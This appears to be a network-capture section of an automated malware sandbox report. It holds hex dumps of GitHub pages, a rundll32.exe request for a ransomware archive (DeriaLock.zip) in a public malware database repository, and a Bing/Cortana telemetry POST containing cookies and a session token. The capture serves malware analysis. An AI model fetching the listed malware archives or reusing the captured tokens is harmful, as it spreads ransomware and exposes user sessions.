                                                                                                                                                            2022-09-29 12:45:34 UTC38040INData Raw: 63 6f 6d 70 6f 6e 65 6e 74 3d 22 74 72 75 65 22 20 63 6c 61 73 73 3d 22 6f 63 74 69 63 6f 6e 20 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 6f 63 74 69 63 6f 6e 2d 70 72 6f 6a 65 63 74 20 64 2d 6e 6f 6e 65 20 66 6c 65 78 2d 73 68 72 69 6e 6b 2d 30 22 3e 0a 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 2d 72 75 6c 65 3d 22 65 76 65 6e 6f 64 64 22 20 64 3d 22 4d 31 2e 37 35 20 30 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 30 20 31 2e 37 35 76 31 32 2e 35 43 30 20 31 35 2e 32 31 36 2e 37 38 34 20 31 36 20 31 2e 37 35 20 31 36 68 31 32 2e 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 36 20 31 34 2e 32 35 56 31 2e 37 35 41 31 2e 37 35 20 31 2e 37 35 20 30 20 30 30 31 34 2e 32 35 20 30 48 31 2e 37 35 7a 4d 31 2e 35 20 31
                                                                                                                                                            Data Ascii: component="true" class="octicon octicon-project js-jump-to-octicon-project d-none flex-shrink-0"> <path fill-rule="evenodd" d="M1.75 0A1.75 1.75 0 000 1.75v12.5C0 15.216.784 16 1.75 16h12.5A1.75 1.75 0 0016 14.25V1.75A1.75 1.75 0 0014.25 0H1.75zM1.5 1
                                                                                                                                                            2022-09-29 12:45:34 UTC38042INData Raw: 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 22 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 64 65 66 61 75 6c 74 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 74 68 69 73 20 75 73 65 72 22 3e 0a 20 20 20 20 20 20 20 20 49 6e 20 74 68 69 73 20 75 73 65 72 0a 20 20 20 20 20 20 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6a 73 2d 6a 75 6d 70 2d 74 6f 2d 62 61 64 67 65 2d 73 65 61 72 63 68 2d 74 65 78 74 2d 67 6c 6f 62 61 6c 20 64 2d 6e 6f 6e 65 22 20 61 72 69 61 2d 6c 61 62 65 6c 3d 22 69 6e 20 61 6c 6c 20 6f 66 20 47 69 74 48 75 62 22 3e 0a 20 20 20 20 20 20 20 20 41 6c 6c 20
                                                                                                                                                            Data Ascii: jump-to-badge-search"> <span class="js-jump-to-badge-search-text-default d-none" aria-label="in this user"> In this user </span> <span class="js-jump-to-badge-search-text-global d-none" aria-label="in all of GitHub"> All
                                                                                                                                                            2022-09-29 12:45:34 UTC38043INData Raw: 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 63 31 61 64 37 61 32 33 30 30 33 33 33 32 37 31 61 63 63 61 36 66 64 37 34 31 62 32 64 64 39 36 36 38 38 36 38 38 30 38 62 31 34 32 61 33 66 61 35 62 39 30 38 33 63 65 63 61 63 33 66 64 62 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 61 74 61 2d 67 61 2d 63 6c 69 63 6b 3d 22 28 4c 6f 67 67 65 64 20 6f 75 74 29 20 48 65 61 64 65 72 2c 20 63 6c 69 63 6b 65 64
                                                                                                                                                            Data Ascii: ://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="c1ad7a2300333271acca6fd741b2dd9668868808b142a3fa5b9083cecac3fdb0" data-ga-click="(Logged out) Header, clicked
                                                                                                                                                            2022-09-29 12:45:34 UTC38044INData Raw: 32 32 45 43 0d 0a 6e 22 20 6e 61 6d 65 3d 22 61 75 74 68 65 6e 74 69 63 69 74 79 5f 74 6f 6b 65 6e 22 20 76 61 6c 75 65 3d 22 43 52 4f 70 79 52 5f 75 45 71 30 58 4f 54 43 4d 4e 59 52 65 56 71 4c 77 62 52 54 52 50 33 65 4f 79 41 7a 78 6f 6e 67 36 45 66 75 4b 73 2d 75 4a 4a 35 56 34 4b 44 70 31 51 7a 62 5a 53 32 67 48 4d 6f 62 41 4d 71 63 39 4c 70 48 56 49 66 77 4e 52 41 35 45 75 41 22 20 2f 3e 20 20 3c 6c 61 62 65 6c 20 66 6f 72 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 3e 0a 20 20 20 20 55 73 65 72 6e 61 6d 65 20 6f 72 20 65 6d 61 69 6c 20 61 64 64 72 65 73 73 0a 20 20 3c 2f 6c 61 62 65 6c 3e 0a 20 20 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 6c 6f 67 69 6e 22 20 69 64 3d 22 6c 6f 67 69 6e 5f 66 69 65 6c 64 22 20 63 6c 61
                                                                                                                                                            Data Ascii: 22ECn" name="authenticity_token" value="CROpyR_uEq0XOTCMNYReVqLwbRTRP3eOyAzxong6EfuKs-uJJ5V4KDp1QzbZS2gHMobAMqc9LpHVIfwNRA5EuA" /> <label for="login_field"> Username or email address </label> <input type="text" name="login" id="login_field" cla
                                                                                                                                                            2022-09-29 12:45:34 UTC38045INData Raw: 6e 74 65 67 72 61 74 69 6f 6e 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 0a 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 6e 61 6d 65 3d 22 72 65 71 75 69 72 65 64 5f 66 69 65 6c 64 5f 64 33 34 32 22 20 68 69 64 64 65 6e 3d 22 68 69 64 64 65 6e 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 68 69 64 64 65 6e 22 20 6e 61 6d 65 3d 22 74 69 6d 65 73 74 61 6d 70 22 20 76 61 6c 75 65 3d 22 31 36 36 34 34 35 35 35 33 34 33 30 37 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 63 6c 61 73 73 3d 22 66 6f 72 6d 2d 63 6f 6e 74 72 6f 6c 22 20 2f 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22
                                                                                                                                                            Data Ascii: ntegration" autocomplete="off" class="form-control" /><input type="text" name="required_field_d342" hidden="hidden" class="form-control" /><input type="hidden" name="timestamp" value="1664455534307" autocomplete="off" class="form-control" /><input type="
                                                                                                                                                            2022-09-29 12:45:34 UTC38047INData Raw: 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 53 49 47 4e 5f 55 50 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6f 72 69 67 69 6e 61 74 69 6e 67 5f 75 72 6c 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 45 6e 64 65 72 6d 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 2f 72 61 77 2f 6d 61 73 74 65 72 2f 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 75 73 65 72 5f 69 64 26 71 75 6f 74 3b 3a 6e 75 6c 6c 7d 7d 22 20 64 61 74 61 2d 68 79 64 72 6f 2d 63 6c 69 63 6b 2d 68 6d 61 63 3d 22 63 31 61 64 37 61 32 33 30 30 33 33 33 32 37 31 61 63 63 61 36 66 64 37 34 31 62 32 64 64 39 36 36 38 38 36 38 38 30 38 62 31 34 32 61 33 66 61 35 62 39 30 38 33 63 65 63 61
                                                                                                                                                            Data Ascii: quot;:&quot;SIGN_UP&quot;,&quot;originating_url&quot;:&quot;https://github.com/Endermanch/MalwareDatabase/raw/master/rogues/Win7Recover.zip&quot;,&quot;user_id&quot;:null}}" data-hydro-click-hmac="c1ad7a2300333271acca6fd741b2dd9668868808b142a3fa5b9083ceca
                                                                                                                                                            2022-09-29 12:45:34 UTC38048INData Raw: 61 6e 63 68 2f 4d 61 6c 77 61 72 65 44 61 74 61 62 61 73 65 26 23 33 39 3b 20 72 65 70 6f 73 69 74 6f 72 79 20 64 6f 65 73 6e 26 23 33 39 3b 74 20 63 6f 6e 74 61 69 6e 20 74 68 65 20 26 23 33 39 3b 72 6f 67 75 65 73 2f 57 69 6e 37 52 65 63 6f 76 65 72 2e 7a 69 70 26 23 33 39 3b 20 70 61 74 68 20 69 6e 20 26 23 33 39 3b 6d 61 73 74 65 72 26 23 33 39 3b 2e 0a 0a 20 20 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 20 20 3c 74 65 6d 70 6c 61 74 65 20 63 6c 61 73 73 3d 22 6a 73 2d 66 6c 61 73 68 2d 74 65 6d 70 6c 61 74 65 22 3e 0a 20 20 20 20 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 66 6c 61 73 68 20 66 6c 61 73 68 2d 66 75 6c 6c 20 20 20 7b 7b 20 63 6c 61 73 73 4e 61 6d 65 20 7d 7d 22 3e 0a 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 78 2d 32 22 20 3e 0a 20 20
                                                                                                                                                            Data Ascii: anch/MalwareDatabase&#39; repository doesn&#39;t contain the &#39;rogues/Win7Recover.zip&#39; path in &#39;master&#39;. </div></div> <template class="js-flash-template"> <div class="flash flash-full {{ className }}"> <div class="px-2" >
                                                                                                                                                            2022-09-29 12:45:34 UTC38049INData Raw: 70 78 22 3e 0a 20 20 20 20 20 20 3c 69 6d 67 20 61 6c 74 3d 22 22 20 63 6c 61 73 73 3d 22 6a 73 2d 70 6c 61 78 69 66 79 20 70 6f 73 69 74 69 6f 6e 2d 61 62 73 6f 6c 75 74 65 22 20 64 61 74 61 2d 69 6e 76 65 72 74 3d 22 74 72 75 65 22 20 64 61 74 61 2d 78 72 61 6e 67 65 3d 22 30 22 20 64 61 74 61 2d 79 72 61 6e 67 65 3d 22 32 30 22 20 68 65 69 67 68 74 3d 22 34 31 35 22 20 77 69 64 74 68 3d 22 39 34 30 22 20 73 74 79 6c 65 3d 22 74 6f 70 3a 20 2d 32 30 70 78 3b 20 6c 65 66 74 3a 20 2d 32 30 70 78 3b 20 7a 2d 69 6e 64 65 78 3a 20 31 3b 20 77 69 64 74 68 3a 20 31 31 30 25 3b 20 68 65 69 67 68 74 3a 20 34 32 35 70 78 22 0a 20 20 20 20 20 20 73 72 63 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 6a 70 65 67 3b 62 61 73 65 36 34 2c 2f 39 6a 2f 34 41 41 51 53 6b 5a 4a
                                                                                                                                                            Data Ascii: px"> <img alt="" class="js-plaxify position-absolute" data-invert="true" data-xrange="0" data-yrange="20" height="415" width="940" style="top: -20px; left: -20px; z-index: 1; width: 110%; height: 425px" src="data:image/jpeg;base64,/9j/4AAQSkZJ
                                                                                                                                                            2022-09-29 12:45:34 UTC38051INData Raw: 6f 41 33 51 36 6f 47 41 38 45 54 4a 68 61 36 30 69 67 74 55 4b 66 45 6c 69 64 56 55 4f 41 35 67 4d 69 55 32 4a 51 71 6d 49 38 45 44 4d 2f 4b 73 54 4f 54 69 30 37 65 43 71 55 34 74 5a 57 46 4e 69 72 68 46 41 4e 56 49 55 77 74 56 69 55 77 43 6f 59 57 71 70 56 42 61 6f 55 77 74 56 51 32 50 44 44 64 41 77 74 33 51 4d 4c 41 4f 55 51 7a 63 4b 34 77 47 41 4b 73 51 77 73 51 4f 4c 4f 45 44 59 4a 68 4d 6d 78 51 68 68 59 71 52 73 46 55 4e 67 67 59 57 38 4b 4c 6a 49 34 68 56 49 4c 4a 44 6d 4e 69 71 44 69 68 52 78 52 4b 4f 48 43 46 4d 4c 44 73 67 4f 48 4b 49 4f 43 4b 4f 43 49 4f 43 47 52 77 55 55 63 46 55 35 42 78 55 4b 32 4b 70 59 4f 43 51 72 59 48 5a 41 63 4f 45 4b 4f 48 43 6e 4d 63 75 52 77 4f 79 73 4b 32 42 51 35 57 77 52 47 77 55 61 62 42 56 47 77 51 48 42 42 73
                                                                                                                                                            Data Ascii: oA3Q6oGA8ETJha60igtUKfElidVUOA5gMiU2JQqmI8EDM/KsTOTi07eCqU4tZWFNirhFANVIUwtViUwCoYWqpVBaoUwtVQ2PDDdAwt3QMLAOUQzcK4wGAKsQwsQOLOEDYJhMmxQhhYqRsFUNggYW8KLjI4hVILJDmNiqDihRxRKOHCFMLDsgOHKIOCKOCIOCGRwUUcFU5BxUK2KpYOCQrYHZAcOEKOHCnMcuRwOysK2BQ5WwRGwUabBVGwQHBBs
                                                                                                                                                            2022-09-29 12:45:34 UTC38052INData Raw: 45 37 49 56 73 54 73 66 42 43 74 67 64 6c 46 48 41 6f 6c 44 43 35 46 6f 2f 54 4b 49 32 43 69 35 62 42 55 72 59 38 49 67 59 6a 5a 52 52 78 2f 79 55 67 32 50 43 52 51 78 47 79 54 49 47 41 51 62 42 49 59 44 41 4a 41 4d 42 73 6d 54 41 59 63 4b 52 61 33 30 2b 45 4b 48 30 79 69 35 44 36 64 79 44 59 4a 7a 6e 4d 47 41 31 55 55 4d 41 69 55 44 36 59 55 71 68 39 50 68 41 75 48 43 4b 47 4b 67 42 74 52 53 34 38 49 6b 4b 62 51 70 79 71 42 73 37 70 56 4b 62 4f 43 67 55 32 48 5a 41 75 48 48 64 46 44 41 72 4b 30 70 39 4e 41 68 73 52 53 6d 79 73 4b 42 54 36 59 32 55 71 35 77 51 2b 6e 77 6f 70 44 5a 77 67 58 48 63 4b 4b 51 32 49 45 4e 71 4b 55 32 68 52 55 7a 5a 77 55 43 47 77 37 49 45 4e 6d 72 4c 4b 34 49 62 45 71 70 6d 77 71 4c 53 6d 31 53 4c 53 47 7a 78 32 55 79 71 57 43
                                                                                                                                                            Data Ascii: E7IVsTsfBCtgdlFHAolDC5Fo/TKI2Ci5bBUrY8IgYjZRRx/yUg2PCRQxGyTIGAQbBIYDAJAMBsmTAYcKRa30+EKH0yi5D6dyDYJznMGA1UUMAiUD6YUqh9PhAuHCKGKgBtRS48IkKbQpyqBs7pVKbOCgU2HZAuHHdFDArK0p9NAhsRSmysKBT6Y2Uq5wQ+nwopDZwgXHcKKQ2IENqKU2hRUzZwUCGw7IENmrLK4IbEqpmwqLSm1SLSGzx2UyqWC
                                                                                                                                                            2022-09-29 12:45:34 UTC38053INData Raw: 35 44 31 34 0d 0a 67 55 32 44 5a 46 70 44 36 59 55 55 68 74 47 6f 55 69 6b 4e 6a 6f 4a 6d 78 51 49 62 55 58 42 44 59 36 63 79 38 36 52 74 51 49 62 50 78 57 57 6f 51 32 39 31 44 43 5a 73 47 69 4e 63 68 44 62 78 33 55 45 7a 5a 33 51 49 62 44 73 6f 70 44 5a 39 36 69 6c 77 51 72 79 52 62 78 43 37 34 63 4b 71 4c 51 4a 31 51 50 6a 74 43 71 5a 55 46 70 5a 45 7a 6c 55 57 70 42 51 57 36 36 71 70 6b 34 74 34 56 67 63 57 6b 71 34 54 4b 6f 73 33 52 46 42 61 39 4b 4b 6f 63 57 61 6c 55 55 46 76 45 49 4b 43 7a 75 69 4b 43 33 68 49 68 78 61 72 45 4f 4c 43 71 48 46 71 75 4d 47 54 69 30 6c 45 4f 4c 43 71 48 46 69 4a 54 69 77 36 42 56 44 44 30 79 67 66 36 61 55 70 78 5a 77 6f 55 77 73 4b 71 55 77 39 4e 44 47 56 42 36 53 55 4d 4c 41 71 68 68 61 4e 46 46 4d 4c 64 46 59 79 4f
                                                                                                                                                            Data Ascii: 5D14gU2DZFpD6YUUhtGoUikNjoJmxQIbUXBDY6cy86RtQIbPxWWoQ291DCZsGiNchDbx3UEzZ3QIbDsopDZ96ilwQryRbxC74cKqLQJ1QPjtCqZUFpZEzlUWpBQW66qpk4t4VgcWkq4TKos3RFBa9KKocWalUUFvEIKCzuiKC3hIhxarEOLCqHFquMGTi0lEOLCqHFiJTiw6BVDD0ygf6aUpxZwoUwsKqUw9NDGVB6SUMLAqhhaNFFMLdFYyO


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            14192.168.2.649715140.82.121.4443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:44:48 UTC699OUTGET /Endermanch/MalwareDatabase/raw/master/ransomwares/DeriaLock.zip HTTP/1.1
                                                                                                                                                            Host: github.com


                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                            140192.168.2.649778131.253.33.200443C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                            TimestampkBytes transferredDirectionData
                                                                                                                                                            2022-09-29 12:45:43 UTC38054OUTPOST /threshold/xls.aspx HTTP/1.1
                                                                                                                                                            Origin: https://www.bing.com
                                                                                                                                                            Referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init
                                                                                                                                                            Content-type: text/xml
                                                                                                                                                            X-MSEdge-ExternalExpType: JointCoord
                                                                                                                                                            X-MSEdge-ExternalExp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40
                                                                                                                                                            X-PositionerType: Desktop
                                                                                                                                                            X-Search-CortanaAvailableCapabilities: CortanaExperience,SpeechLanguage
                                                                                                                                                            X-Search-SafeSearch: Moderate
                                                                                                                                                            X-Device-MachineId: {A2AB526A-D38D-4FC9-8BA0-E34B8D6354E8}
                                                                                                                                                            X-UserAgeClass: Unknown
                                                                                                                                                            X-BM-Market: US
                                                                                                                                                            X-BM-DateFormat: M/d/yyyy
                                                                                                                                                            X-CortanaAccessAboveLock: false
                                                                                                                                                            X-Device-OSSKU: 48
                                                                                                                                                            X-BM-DTZ: -420
                                                                                                                                                            X-BM-FirstEnabledTime: 132061387448759736
                                                                                                                                                            X-DeviceID: 0100748C09001CEA
                                                                                                                                                            X-BM-DeviceScale: 100
                                                                                                                                                            X-Search-TimeZone: Bias=480; DaylightBias=-60; TimeZoneKeyName=Pacific Standard Time
                                                                                                                                                            X-BM-Theme: 000000;0078d7
                                                                                                                                                            X-BM-DeviceDimensionsLogical: 1232x1024
                                                                                                                                                            X-BM-DeviceDimensions: 1232x1024
                                                                                                                                                            X-Agent-DeviceId: 0100748C09001CEA
                                                                                                                                                            X-Search-RPSToken: t%3DEwDYAkR8BAAUcvamItSE/vUHpyZRp3BeyOJPQDsAAamq5M9zPR5nuHfG3veMN5/jENMWNA4fbZEHrQpT8BxSz5%2BSh5s4f1VkbpEPJ9rOEPqabrlSbr3eu%2BoZ%2BB2QzG133x3OMu2w96LpDS72zKITv4CbqIeNkcmWB/nVghgXwvmWdxixlmtp6kSunXq0UxzmSBBrhPFVEwr%2B7mBUJhX5BUVIhqC%2B/divBqd1yet423TssuRskex24LtlkR6K5yP46R4zY881kAl/bUeEXcX7f5ULouRbplsaB3Dq1106wr4WW0K9M0VClTT34J86Y3c4PD0df7CmcP8WgB8qmWS1O2hKAoBamMRHZrSlmrH7NLzQDNCD1dIERCgVe2ufG5UDZgAACKOSvVfSgvd%2BqAGDhQ99hvMd5BU4o1M9GfaTzGHI6kqy4kOCqlaLU5wwi4ftfXIfqdARi2nWjggxLkcbJrJKl/g6hsdBRJyB9Hrdvn%2BU63FMHfZPLGZuGzPc9FN2qZC26frSLvI60cKLfeUt2SU6SQu%2BhuqdeyO/ThXuNgcfzrj3WejpOiRFHFeJ%2BeGrTapCDATYQ015PS188H8jEgFi9YsBp7gjZSPEg4CaGzlxgSACxhv6xhgATPyAkNWgcdSn90JBWajvPogFLs0GL1ugBmGAglEvFBeu7kxJjhrk7Lvl1EIB2pr4TNxLX5YwNxi1faaPg6yB5CD5mhOgnCGmf9RYdN6YATZQB45gzbl55n2FdvF0JDFgmwOXUAiOnR%2BX7JIMaeE6etzOS2YrO7c8K2Vp/gyZ6s/x6w6hs6lFOJPLHxwwE6DPsskFwiEF5Ma3p%2Bp9r31XNsuQDims7OK6dWJYMo6ej2eVHZSbid%2B3skvim3vN0GOipf4OGHIJCdZeovRtAtKl0g2uPL%2B5lkr4%2BXyDrYl6yPiq8LJ6V16ftmQdSLdXGC2YgiUjjswpD8ppqZmI1gE%3D%26p%3D
                                                                                                                                                            X-BM-CBT: 1660690402
                                                                                                                                                            X-Device-isOptin: true
                                                                                                                                                            X-Device-Touch: false
                                                                                                                                                            X-Device-ClientSession: 27851B8F478B4558A23A9FEEA1D2C283
                                                                                                                                                            X-Search-AppId: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUI
                                                                                                                                                            X-BM-ClientFeatures: pbitcpdisabled,AmbientWidescreen,rs1musicprod,CortanaSPAXamlHeader
                                                                                                                                                            Accept: */*
                                                                                                                                                            Accept-Language: en-US
                                                                                                                                                            Accept-Encoding: gzip, deflate, br
                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.10.7.17134; 10.0.0.0.17134.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/64.0.3282.140 Safari/537.36 Edge/17.17134
                                                                                                                                                            Host: www.bing.com
                                                                                                                                                            Content-Length: 65252
                                                                                                                                                            Connection: Keep-Alive
                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                            Cookie: MUID=54AD14FB4D1E4A6C815A867991009454; _SS=CPID=1664487862703&AC=1&CPH=4ef661f2; SRCHUID=V=2&GUID=CA49BB2BEB184018891765A9BD1D863D&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20220929; SRCHHPGUSR=SRCHLANG=en; ANON=A=84D464251C6428FCBF66122FFFFFFFFF; MUIDB=54AD14FB4D1E4A6C815A867991009454
                                                                                                                                                            2022-09-29 12:45:43 UTC38057OUTData Raw: 3c 43 6c 69 65 6e 74 49 6e 73 74 52 65 71 75 65 73 74 3e 3c 43 49 44 3e 31 34 44 35 41 36 39 41 42 45 46 46 36 39 36 32 30 31 34 35 41 44 30 35 42 46 43 37 36 38 35 38 3c 2f 43 49 44 3e 3c 45 76 65 6e 74 73 3e 3c 45 3e 3c 54 3e 45 76 65 6e 74 2e 43 6c 69 65 6e 74 49 6e 73 74 3c 2f 54 3e 3c 49 47 3e 34 37 63 64 64 34 30 30 30 64 38 37 34 38 38 37 61 62 66 37 66 34 37 37 61 36 64 65 36 66 66 63 3c 2f 49 47 3e 3c 44 3e 3c 21 5b 43 44 41 54 41 5b 7b 22 43 75 72 55 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 2f 41 53 2f 41 50 49 2f 57 69 6e 64 6f 77 73 43 6f 72 74 61 6e 61 50 61 6e 65 2f 56 32 2f 49 6e 69 74 22 2c 22 50 69 76 6f 74 22 3a 22 51 46 22 2c 22 43 46 22 3a 22 70 62 69 74 63 70 64 69 73 61 62 6c 65 64 2c 41 6d 62 69 65
                                                                                                                                                            Data Ascii: <ClientInstRequest><CID>14D5A69ABEFF69620145AD05BFC76858</CID><Events><E><T>Event.ClientInst</T><IG>47cdd4000d874887abf7f477a6de6ffc</IG><D><![CDATA[{"CurUrl":"https://www.bing.com/AS/API/WindowsCortanaPane/V2/Init","Pivot":"QF","CF":"pbitcpdisabled,Ambie
                                                                                                                                                            2022-09-29 12:45:43 UTC38073OUTData Raw: 2f 2d 31 2f 40 76 2f 40 75 2f 40 75 2f 40 75 2b 40 77 2f 38 2f 64 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 25 32 46 64 39 66 62 30 34 66 31 2d 62 66 62 30 2d 34 36 39 35 2d 62 62 65 34 2d 30 39 62 34 30 31 65 35 35 33 34 64 2f 40 72 2f 61 2f 40 73 2f 40 77 2f 2d 31 2f 40 77 2f 40 75 2f 40 75 2f 40 75 2b 70 32 75 2f 39 2f 2f 40 64 2f 40 78 2f 40 66 2f 31 2f 40 67 2f 40 79 2f 2d 31 2f 40 79 2f 40 79 2f 40 79 2f 40 79 2b 40 7a 2f 61 2f 6e 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 25 32 46 36 31 38 34 30 63 64 33 2d 62 64 33 32 2d 34 36 62 32 2d 62 37 61 33 2d 61 63 34 65 36 36 61 30 39 38 65 32 2f 40 72 2f 37 2f 40 73 2f 40 7a 2f 2d 31 2f 40 7a 2f 40 31 30 2f 40 31 30 2f 40 31 30 2b 40 31 31 2f 62 2f 2f 2f 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 25 32 46 61 64
                                                                                                                                                            Data Ascii: /-1/@v/@u/@u/@u+@w/8/d//www.bing.com%2Fd9fb04f1-bfb0-4695-bbe4-09b401e5534d/@r/a/@s/@w/-1/@w/@u/@u/@u+p2u/9//@d/@x/@f/1/@g/@y/-1/@y/@y/@y/@y+@z/a/n//www.bing.com%2F61840cd3-bd32-46b2-b7a3-ac4e66a098e2/@r/7/@s/@z/-1/@z/@10/@10/@10+@11/b///www.bing.com%2Fad
                                                                                                                                                            2022-09-29 12:45:43 UTC38089OUTData Raw: 37 38 36 37 37 32 30 2c 22 52 54 53 22 3a 33 37 39 37 34 36 35 30 38 37 2c 22 53 45 51 22 3a 34 2c 22 55 54 53 22 3a 31 36 36 34 34 38 37 39 34 33 33 35 34 7d 5d 5d 3e 3c 2f 44 3e 3c 54 53 3e 31 36 36 34 34 38 37 38 36 37 37 32 30 3c 2f 54 53 3e 3c 2f 45 3e 3c 2f 45 76 65 6e 74 73 3e 3c 47 72 6f 75 70 3e 3c 4d 3e 3c 49 47 3e 34 37 63 64 64 34 30 30 30 64 38 37 34 38 38 37 61 62 66 37 66 34 37 37 61 36 64 65 36 66 66 63 3c 2f 49 47 3e 3c 44 53 3e 3c 21 5b 43 44 41 54 41 5b 5b 7b 22 54 22 3a 22 44 2e 41 67 67 72 65 67 61 74 6f 72 22 2c 22 53 65 72 76 69 63 65 22 3a 22 41 75 74 6f 53 75 67 67 65 73 74 22 2c 22 53 63 65 6e 61 72 69 6f 22 3a 22 41 67 67 72 65 67 61 74 6f 72 22 2c 22 41 70 70 4e 53 22 3a 22 53 6d 61 72 74 53 65 61 72 63 68 22 2c 22 44 53 22 3a
                                                                                                                                                            Data Ascii: 7867720,"RTS":3797465087,"SEQ":4,"UTS":1664487943354}...</D><TS>1664487867720</TS></E></Events><Group><M><IG>47cdd4000d874887abf7f477a6de6ffc</IG><DS><![CDATA[[{"T":"D.Aggregator","Service":"AutoSuggest","Scenario":"Aggregator","AppNS":"SmartSearch","DS":
                                                                                                                                                            2022-09-29 12:45:43 UTC38105OUTData Raw: 22 47 72 22 3a 30 2c 22 44 65 76 69 63 65 53 69 67 6e 61 6c 73 22 3a 7b 22 52 61 6e 6b 22 3a 34 32 37 32 2c 22 50 48 69 74 73 22 3a 22 53 79 73 74 65 6d 2e 50 61 72 73 69 6e 67 4e 61 6d 65 22 2c 22 49 64 22 3a 22 7b 31 41 43 31 34 45 37 37 2d 30 32 45 37 2d 34 45 35 44 2d 42 37 34 34 2d 32 45 42 31 41 45 35 31 39 38 42 37 7d 5c 5c 73 65 72 76 69 63 65 73 2e 6d 73 63 22 2c 22 44 4e 61 6d 65 22 3a 22 53 65 72 76 69 63 65 73 22 2c 22 4c 41 44 22 3a 22 32 30 32 30 2d 30 39 2d 33 30 54 31 35 3a 32 32 3a 35 32 2e 37 31 34 5a 22 2c 22 41 70 70 4c 6e 63 68 22 3a 31 2c 22 41 72 67 73 22 3a 30 2c 22 4d 44 4e 22 3a 30 2c 22 45 78 74 22 3a 22 2e 6d 73 63 22 7d 2c 22 52 61 6e 6b 65 72 53 69 67 6e 61 6c 73 22 3a 7b 22 72 61 6e 6b 69 6e 67 53 63 6f 72 65 22 3a 31 30 2e
                                                                                                                                                            Data Ascii: "Gr":0,"DeviceSignals":{"Rank":4272,"PHits":"System.ParsingName","Id":"{1AC14E77-02E7-4E5D-B744-2EB1AE5198B7}\\services.msc","DName":"Services","LAD":"2020-09-30T15:22:52.714Z","AppLnch":1,"Args":0,"MDN":0,"Ext":".msc"},"RankerSignals":{"rankingScore":10.
                                                                                                                                                            2022-09-29 12:45:43 UTC38121INHTTP/1.1 204 No Content
                                                                                                                                                            Access-Control-Allow-Origin: *
                                                                                                                                                            X-Cache: CONFIG_NOCACHE
                                                                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                            X-MSEdge-Ref: Ref A: 817ADBDF9E77474C97AFD1280630A09A Ref B: VIEEDGE1116 Ref C: 2022-09-29T12:45:43Z
